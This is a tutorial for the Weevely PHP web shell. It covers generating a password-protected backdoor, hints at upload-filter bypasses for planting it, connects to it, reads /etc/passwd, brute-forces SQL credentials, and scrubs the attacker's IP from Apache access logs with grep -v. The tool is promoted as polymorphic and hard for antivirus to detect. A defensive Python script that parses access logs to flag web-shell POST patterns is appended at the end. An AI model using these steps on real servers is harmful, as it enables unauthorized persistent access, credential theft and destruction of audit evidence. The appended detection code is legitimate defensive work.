Weevely Tutorial – Basic to Advanced PHP Webshell

Weevely is a stealth PHP web shell that is designed for remote server administration and penetration testing.

It simplifies the administration of your web account, especially with unprivileged accounts such as free hosting services and other shared environments. It is an essential tool for post-exploitation tasks such as privilege escalation and maintaining access even in restricted environments, and it can be used as a stealth backdoor.

Features:

  • SSH-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account brute force
  • Compressed archive management

The remote agent is a small PHP script which can extend its functionality over the network at run-time. The agent code is polymorphic and hard for AV to detect, and the traffic is obfuscated within the HTTP requests.

Weevely also provides a Python API for developing your own modules.

Weevely Installation

root@cybarrior:~# pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

root@cybarrior:~# apt-get install g++ python-pip libyaml-dev python-dev

Usage


Generate a backdoor

root@ddos:~# weevely generate ddos ddos.php

Generated backdoor with password 'ddos' in 'ddos.php' of 1439 byte size.

root@ddos:/usr/share/weevely# ls

bd core ddos.php modules utils weevely.py

You still need a way to get the web shell onto the target, e.g. a double extension, bypassing image-type validation, or bypassing an extension whitelist/blacklist.

Connect to the backdoor

root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos

Bypass Policy to Read /etc/passwd

www-data@ddos:/etc $ audit_etcpasswd

Guess the SQL user credentials

This tip teaches you how to guess the credentials of multiple SQL users.

weevely> bruteforce_sql --help

Log cleanup

This section shows how to remove the traces of your session from the server's logs.

We use the system_info command to find our own IP address:

www-data@ddos:/var/log $ system_info -info client_ip

We use the grep command to confirm that requests from our IP address are recorded in the log file:

www-data@ddos:/var/log/apache2 $ cat '/var/log/apache2/access.log.1' | grep "192.168.1.8"

The log shows the activity of our IP address. We use grep again, this time with -v, to drop the lines containing that IP address, and save the result to a temporary file:

www-data@ddos:/var/log/apache2 $ cat '/var/log/apache2/access.log.1' | grep -v "192.168.1.8" > cleaned.log

Check that the entries are gone from cleaned.log.

Then replace access.log.1 with cleaned.log.
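The same access log looks very different from the server side. As an added example that is not part of this tutorial or of the Weevely project, the script below parses Apache combined-format lines, groups them by client IP (the exact-match counterpart of the grep above) and flags the pattern a connected web shell leaves behind: one client repeatedly POSTing to a single PHP file with no referer. The log lines are constructed for the example, and the flagging rule is an assumed illustrative heuristic, not a Weevely signature; the function names are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines (not captured from a real server): a normal visitor
# at 192.168.1.20 and a client at 192.168.1.8 POSTing repeatedly to one PHP file,
# plus one malformed line to show that the parser does not silently drop input.
SAMPLE_LOG = """\
192.168.1.20 - - [10/Mar/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2019:10:01:03 +0000] "GET /style.css HTTP/1.1" 200 300 "http://192.168.1.8/" "Mozilla/5.0"
192.168.1.8 - - [10/Mar/2019:10:02:10 +0000] "POST /ddos.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.8 - - [10/Mar/2019:10:02:11 +0000] "POST /ddos.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.168.1.8 - - [10/Mar/2019:10:02:12 +0000] "POST /ddos.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2019:10:03:00 +0000] "GET /about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
this line is not in combined format
"""


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def parse_log(text):
    """Parse every non-empty line; unparseable lines are returned separately for review."""
    entries, bad = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            bad.append(line)
        else:
            entries.append(entry)
    return entries, bad


def requests_by_ip(entries):
    """Group parsed entries by client IP using an exact field match (unlike a substring grep)."""
    by_ip = defaultdict(list)
    for entry in entries:
        by_ip[entry["ip"]].append(entry)
    return dict(by_ip)


def webshell_candidates(entries, min_posts=3):
    """Assumed heuristic: flag (ip, path, count) where one client POSTs to the same
    .php file at least min_posts times without a referer, i.e. a script, not a browser."""
    counts = defaultdict(int)
    for entry in entries:
        if (entry["method"] == "POST"
                and entry["path"].lower().endswith(".php")
                and entry["referer"] == "-"):
            counts[(entry["ip"], entry["path"])] += 1
    return sorted((ip, path, n) for (ip, path), n in counts.items() if n >= min_posts)


if __name__ == "__main__":
    entries, bad = parse_log(SAMPLE_LOG)
    for ip, reqs in requests_by_ip(entries).items():
        print(f"{ip}: {len(reqs)} requests, paths={sorted({e['path'] for e in reqs})}")
    for ip, path, n in webshell_candidates(entries):
        print(f"candidate web shell: {ip} -> {path} ({n} POSTs)")
    print(f"{len(bad)} unparseable line(s) kept for manual review")
```

Run against a real access log by replacing SAMPLE_LOG with the file contents; the referer and POST-count thresholds are the knobs to tune for a given site.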
